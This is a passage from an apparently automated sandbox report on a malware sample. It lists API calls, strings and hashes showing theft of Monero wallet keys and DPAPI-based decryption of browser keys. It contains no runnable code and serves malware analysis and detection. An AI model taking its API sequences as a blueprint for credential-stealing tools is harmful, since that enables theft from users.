                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: edc0e9355bbadd869b9681a5ef815317ced3260a182324d418d1c55275c289f5
                              • Instruction ID: 78eda8a37334b862873b78cfecfc7c76db1ac1cb6cb9cf86c5912191c0ca29c0
                              • Opcode Fuzzy Hash: edc0e9355bbadd869b9681a5ef815317ced3260a182324d418d1c55275c289f5
                              • Instruction Fuzzy Hash: DE119EB1A44305EBE704CF98EC4AFBBBBB9FB04B11F10412AFA05A72C0D77458058BA1
                              APIs
                              • StrStrA.SHLWAPI(013DE4F0,?,?,?,0065140C,?,013DE4F0,00000000), ref: 0065926C
                              • lstrcpyn.KERNEL32(0088AB88,013DE4F0,013DE4F0,?,0065140C,?,013DE4F0), ref: 00659290
                              • lstrlen.KERNEL32(?,?,0065140C,?,013DE4F0), ref: 006592A7
                              • wsprintfA.USER32 ref: 006592C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 33cd0c1c2386edc9bcb3fdcc2c509748e939b32325d72a5847ebe5212da4bffb
                              • Instruction ID: 782f419f1a892cc6d2e432f5a1a141ae1fa3c36daea14718a695e1387d46e0c4
                              • Opcode Fuzzy Hash: 33cd0c1c2386edc9bcb3fdcc2c509748e939b32325d72a5847ebe5212da4bffb
                              • Instruction Fuzzy Hash: 0F01D775500208FFDB18DFECC984AAE7BB9FB44361F108149F9098B244C635EA409BA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006412B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 006412BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006412D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006412F5
                              • RegCloseKey.ADVAPI32(?), ref: 006412FF
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 8b87764efed4f6afee4d0c9c513d18778cdbdf02c93c1341dd1ef6585f5a71b3
                              • Instruction ID: f9dd45cdd65ea5f73341b82779ef811b3207e3e04fc6af4624d24fc80803281c
                              • Opcode Fuzzy Hash: 8b87764efed4f6afee4d0c9c513d18778cdbdf02c93c1341dd1ef6585f5a71b3
                              • Instruction Fuzzy Hash: AD0136B5A40208BBEB04DFD4DC49FAEB7B8FB48701F008155FA05D72C0D6759A419F51
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00656663
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00656726
                              • ExitProcess.KERNEL32 ref: 00656755
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: b019f476dc9c42f4f95bb81afd9c58a00730a63a5ebc894a8267fcf2bd304498
                              • Instruction ID: 3df817b76831eff82836dab288a7c77efd95eddcb8ff2be536532b08fdd80b30
                              • Opcode Fuzzy Hash: b019f476dc9c42f4f95bb81afd9c58a00730a63a5ebc894a8267fcf2bd304498
                              • Instruction Fuzzy Hash: 5E3129B1801218AADB58EB94DC92BDEB779BF04301F404299F60966191DF746B48CF6A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00660E28,00000000,?), ref: 0065882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00658836
                              • wsprintfA.USER32 ref: 00658850
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 366f9f57b6716cb827258f5db2595fbcbcfc9661bd3548c1bccbd81bd2b8a9cc
                              • Instruction ID: 7d807cd4f89f69e238bd43faa04e4072df8b8922b0bdc0113da94799f3f9c8ff
                              • Opcode Fuzzy Hash: 366f9f57b6716cb827258f5db2595fbcbcfc9661bd3548c1bccbd81bd2b8a9cc
                              • Instruction Fuzzy Hash: DE2112B1A40204AFEB04DFD8DD45FAEBBB9FB48711F104119FA05A72C0C7799901CBA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0065951E,00000000), ref: 00658D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00658D62
                              • wsprintfW.USER32 ref: 00658D78
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: c2f3637451833de76951830408cb0a62c54b59bd5f6721b7b735868c5c817920
                              • Instruction ID: f2d1f5bf35a152fe7a665852ffb711d21566f063a9480d01dffe5161aba88b4d
                              • Opcode Fuzzy Hash: c2f3637451833de76951830408cb0a62c54b59bd5f6721b7b735868c5c817920
                              • Instruction Fuzzy Hash: BFE0E675A40208BBE714DB98DD09E5977B8FB44701F104165FE09972C0D9715E109B66
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 00658B60: GetSystemTime.KERNEL32(00660E1A,013DF0B8,006605AE,?,?,006413F9,?,0000001A,00660E1A,00000000,?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 00658B86
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0064A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0064A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0064A6BC
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0064A743
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 88a6bbbc4557850d61d2c7d114fd0f5411516ebb2aa2c458f88e1253cbd60e43
                              • Instruction ID: ad4b2a9c0c61f5f0e34f1166337f266aa69813c7c2c116ca07243d66781658d8
                              • Opcode Fuzzy Hash: 88a6bbbc4557850d61d2c7d114fd0f5411516ebb2aa2c458f88e1253cbd60e43
                              • Instruction Fuzzy Hash: AFE1ED728101189ADB48EBE4DC92EEE733ABF14301F50825DF91776091EF346A4DCB6A
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 00658B60: GetSystemTime.KERNEL32(00660E1A,013DF0B8,006605AE,?,?,006413F9,?,0000001A,00660E1A,00000000,?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 00658B86
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0064D481
                              • lstrlen.KERNEL32(00000000), ref: 0064D698
                              • lstrlen.KERNEL32(00000000), ref: 0064D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0064D72B
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 40f05e29509bbcc6ba7a9083501058a1a3f1a91071bf8aa1f276d669269faa84
                              • Instruction ID: 6a9c7b89227700a38dbb33fae724bb657d6582e4ffd75fe932481da93f09063f
                              • Opcode Fuzzy Hash: 40f05e29509bbcc6ba7a9083501058a1a3f1a91071bf8aa1f276d669269faa84
                              • Instruction Fuzzy Hash: 8A91FD729101189ADB48FBE4DD96DEE733ABF14301F50426DF907A6091EF346A0DCB6A
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 00658B60: GetSystemTime.KERNEL32(00660E1A,013DF0B8,006605AE,?,?,006413F9,?,0000001A,00660E1A,00000000,?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 00658B86
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0064D801
                              • lstrlen.KERNEL32(00000000), ref: 0064D99F
                              • lstrlen.KERNEL32(00000000), ref: 0064D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0064DA32
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 77551c2af45d927e575c5fc8d3df6c16ee95b5e39fefa6d80cf98799e2fc74f2
                              • Instruction ID: d3056aafe1bbe6855835f2cefffd59a56b98c901477ce7a11f1b0e9196850c38
                              • Opcode Fuzzy Hash: 77551c2af45d927e575c5fc8d3df6c16ee95b5e39fefa6d80cf98799e2fc74f2
                              • Instruction Fuzzy Hash: D281EC729101189ADB48FBE4DC96DEE733ABF14301F50422DF906A6191EF346A0DCB6A
                              APIs
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006499EC
                                • Part of subcall function 006499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00649A11
                                • Part of subcall function 006499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00649A31
                                • Part of subcall function 006499C0: ReadFile.KERNEL32(000000FF,?,00000000,0064148F,00000000), ref: 00649A5A
                                • Part of subcall function 006499C0: LocalFree.KERNEL32(0064148F), ref: 00649A90
                                • Part of subcall function 006499C0: CloseHandle.KERNEL32(000000FF), ref: 00649A9A
                                • Part of subcall function 00658E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00658E52
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00661580,00660D92), ref: 0064F54C
                              • lstrlen.KERNEL32(00000000), ref: 0064F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 524f63bd0376e8849fd06cdfdc254b1ce60844a3cd6adb551da01e9ce47ba4f9
                              • Instruction ID: 90e46cfe50944dbe7d0918a584e2268765ad250d024e668e048f4288a8ba84eb
                              • Opcode Fuzzy Hash: 524f63bd0376e8849fd06cdfdc254b1ce60844a3cd6adb551da01e9ce47ba4f9
                              • Instruction Fuzzy Hash: C9511F75D10108AADB44FBE4DC96DED773AAF54301F40862CFC16A7191EE346A0DCBAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: d35c8bfe29d53bee746f99d374738f250137410f307c8874b698ab5e10d9fba2
                              • Instruction ID: 4faa64ad5f5251e21bfb4abaf7340e42f40be851dab32a07711f83ef8b8c8e6f
                              • Opcode Fuzzy Hash: d35c8bfe29d53bee746f99d374738f250137410f307c8874b698ab5e10d9fba2
                              • Instruction Fuzzy Hash: 9A415F75D10109ABDB04EFE4C845AEEB776BF54705F00852CE81277390EB75AA09CFA6
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 006499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006499EC
                                • Part of subcall function 006499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00649A11
                                • Part of subcall function 006499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00649A31
                                • Part of subcall function 006499C0: ReadFile.KERNEL32(000000FF,?,00000000,0064148F,00000000), ref: 00649A5A
                                • Part of subcall function 006499C0: LocalFree.KERNEL32(0064148F), ref: 00649A90
                                • Part of subcall function 006499C0: CloseHandle.KERNEL32(000000FF), ref: 00649A9A
                                • Part of subcall function 00658E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00658E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00649D39
                                • Part of subcall function 00649AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nd,00000000,00000000), ref: 00649AEF
                                • Part of subcall function 00649AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00644EEE,00000000,?), ref: 00649B01
                                • Part of subcall function 00649AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nd,00000000,00000000), ref: 00649B2A
                                • Part of subcall function 00649AC0: LocalFree.KERNEL32(?,?,?,?,00644EEE,00000000,?), ref: 00649B3F
                                • Part of subcall function 00649B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00649B84
                                • Part of subcall function 00649B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00649BA3
                                • Part of subcall function 00649B60: LocalFree.KERNEL32(?), ref: 00649BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 2ca02b60acaf4ace2cb6d123189d5d56e810a7eb2ee33ee50c3d9c32013f723b
                              • Instruction ID: 3409033ae2e2447439a4d4f9563dad617f00378e4858d9634b2e697b5133e510
                              • Opcode Fuzzy Hash: 2ca02b60acaf4ace2cb6d123189d5d56e810a7eb2ee33ee50c3d9c32013f723b
                              • Instruction Fuzzy Hash: 1E315EB6D10609ABCF04DFE4DC86AEFB7BABF48304F144519E905A7241EB349A44CBB5
                              APIs
                              • memset.MSVCRT ref: 006594EB
                                • Part of subcall function 00658D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0065951E,00000000), ref: 00658D5B
                                • Part of subcall function 00658D50: RtlAllocateHeap.NTDLL(00000000), ref: 00658D62
                                • Part of subcall function 00658D50: wsprintfW.USER32 ref: 00658D78
                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 006595AB
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 006595C9
                              • CloseHandle.KERNEL32(00000000), ref: 006595D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID:
                              • API String ID: 3729781310-0
                              • Opcode ID: be720c151800ce2ed9ac5fa7ca80bec26a093bb2bbcff8c44acc094476c1e8bc
                              • Instruction ID: 7887be2a0c40b21a439fa7e5b91690f29a38345d01527ca4acb62c19add3e481
                              • Opcode Fuzzy Hash: be720c151800ce2ed9ac5fa7ca80bec26a093bb2bbcff8c44acc094476c1e8bc
                              • Instruction Fuzzy Hash: D5311C71A00308DFEB14DBD4CD49BEDB7B9FB44701F204559E906AB284EB74AA89CB51
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006605B7), ref: 006586CA
                              • Process32First.KERNEL32(?,00000128), ref: 006586DE
                              • Process32Next.KERNEL32(?,00000128), ref: 006586F3
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • CloseHandle.KERNEL32(?), ref: 00658761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 80bc9affa4ab0d26ccda00e5837680c213364c199c33e92fe01e1c4975656f82
                              • Instruction ID: aef0261570677b7e477eb31a5677b9ddd0057d29b979fb02d4c3a8f0ca5cad6d
                              • Opcode Fuzzy Hash: 80bc9affa4ab0d26ccda00e5837680c213364c199c33e92fe01e1c4975656f82
                              • Instruction Fuzzy Hash: 18314F71901218ABDB64DF94DC45FEEB779FB49701F1042ADE90AA2190DB306A49CFA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00660E00,00000000,?), ref: 006579B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 006579B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00660E00,00000000,?), ref: 006579C4
                              • wsprintfA.USER32 ref: 006579F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: d8c2c5701c12c39a31a036859f1c73709573d355536ce05d20846d341cba0bd7
                              • Instruction ID: c33cb7d611448d38a5c3d54ffef11a36b9693e59de555aa027b6ccef1c006125
                              • Opcode Fuzzy Hash: d8c2c5701c12c39a31a036859f1c73709573d355536ce05d20846d341cba0bd7
                              • Instruction Fuzzy Hash: BD110CB2904118ABDB14DFD9DD45BBEB7F8FB4CB11F10415AF605A2280E7795940C7B1
                              APIs
                              • __getptd.LIBCMT ref: 0065C74E
                                • Part of subcall function 0065BF9F: __amsg_exit.LIBCMT ref: 0065BFAF
                              • __getptd.LIBCMT ref: 0065C765
                              • __amsg_exit.LIBCMT ref: 0065C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0065C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: ef193fcbf220add0cf5db42bb4181cad99b7fd1452735e9f37057dd2c457574c
                              • Instruction ID: 3cfa2121956af4d5da0f185c5cb79e45d5b0fbbf4fb101b450d37f3e96375746
                              • Opcode Fuzzy Hash: ef193fcbf220add0cf5db42bb4181cad99b7fd1452735e9f37057dd2c457574c
                              • Instruction Fuzzy Hash: C2F090329007109FD7A0BFB85806B8D33A3AF04737F24514DFC14A66D2CB6459899E5E
                              APIs
                                • Part of subcall function 00658DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00658E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00654F7A
                              • lstrcat.KERNEL32(?,00661070), ref: 00654F97
                              • lstrcat.KERNEL32(?,013D8888), ref: 00654FAB
                              • lstrcat.KERNEL32(?,00661074), ref: 00654FBD
                                • Part of subcall function 00654910: wsprintfA.USER32 ref: 0065492C
                                • Part of subcall function 00654910: FindFirstFileA.KERNEL32(?,?), ref: 00654943
                                • Part of subcall function 00654910: StrCmpCA.SHLWAPI(?,00660FDC), ref: 00654971
                                • Part of subcall function 00654910: StrCmpCA.SHLWAPI(?,00660FE0), ref: 00654987
                                • Part of subcall function 00654910: FindNextFileA.KERNEL32(000000FF,?), ref: 00654B7D
                                • Part of subcall function 00654910: FindClose.KERNEL32(000000FF), ref: 00654B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: da0b59d92c5f86fe3113c5883c15e401d3c086363b5f4d9213228e4d5a53edac
                              • Instruction ID: 2f05edc164e7906ea8a972d8858d60d61fabf2d334cc722c0e58f1c923783ceb
                              • Opcode Fuzzy Hash: da0b59d92c5f86fe3113c5883c15e401d3c086363b5f4d9213228e4d5a53edac
                              • Instruction Fuzzy Hash: F921CBB69002046BD798FBB4DC46EE9333DBB54300F004559B649971C1EE7496CC8BA6